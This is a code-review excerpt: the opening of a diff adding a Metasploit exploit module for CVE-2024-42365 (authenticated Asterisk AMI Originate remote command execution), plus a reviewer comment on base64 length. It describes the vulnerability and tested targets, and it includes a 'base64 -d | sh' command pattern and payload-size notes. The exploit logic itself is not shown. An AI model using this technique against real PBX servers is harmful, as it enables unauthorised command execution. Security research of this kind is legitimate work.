modules/exploits/linux/misc/asterisk_ami_originate_auth_rce.rb

```diff
@@ -0,0 +1,215 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = GreatRanking
+  include Msf::Exploit::Remote::Asterisk
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Asterisk AMI Originate Authenticated RCE',
+        'Description' => %q{
+          On Asterisk, prior to versions 18.24.2, 20.9.2, and 21.4.2 and certified-asterisk
+          versions 18.9-cert11 and 20.7-cert2, an AMI user with 'write=originate' may change
+          all configuration files in the '/etc/asterisk/' directory. Writing a new extension
+          can be created which performs a system command to achieve RCE as the asterisk service
+          user (typically asterisk).
+          Default parking lot in FreePBX is called "Default lot" on the website interface,
+          however its actually 'parkedcalls'.
+          Tested against Asterisk 19.8.0 and 18.16.0 on Freepbx SNG7-PBX16-64bit-2302-1.
+          Asterisk 18.6.0 on Freepbx SNG7-PBX16-64bit-2302-1 was NOT exploitable.
+        },
+        'Author' => [
+          'Brendan Coles <bcoles[at]gmail.com>', # lots of AMI command stuff
+          'h00die', # msf module
+          'NielsGaljaard' # discovery
+        ],
+        'References' => [
+          ['URL', 'https://github.com/asterisk/asterisk/security/advisories/GHSA-c4cg-9275-6w44'],
+          ['CVE', '2024-42365']
+        ],
+        'Platform' => 'unix',
+        # leaving this for future travelers. I was still not getting 100% payload compatibility
+        # so there seems to still be another character or two bad, but b64 fixed it.
+        # 'Payload' => {
+        #  # ; is a comment in the extensions.conf file
+        #  'BadChars' => ";\r\n:\"" # https://docs.asterisk.org/Configuration/Interfaces/Asterisk-Manager-Interface-AMI/AMI-v2-Specification/#message-layout
+        # },
+
+        # 927 characters (w/o padding) is the max (Error, Message: Failed to parse message: line too long)
+        # `echo "" | base64 -d | sh` == 19 characters
+        # chatGPT says 908 b64 encoded characters makes 681 pre-encoding.
```

Comment:
The worse possible size increase for a string of size `n` is `ceil(n / 3) * 4`, which indeed makes it 681 chars per-encoding.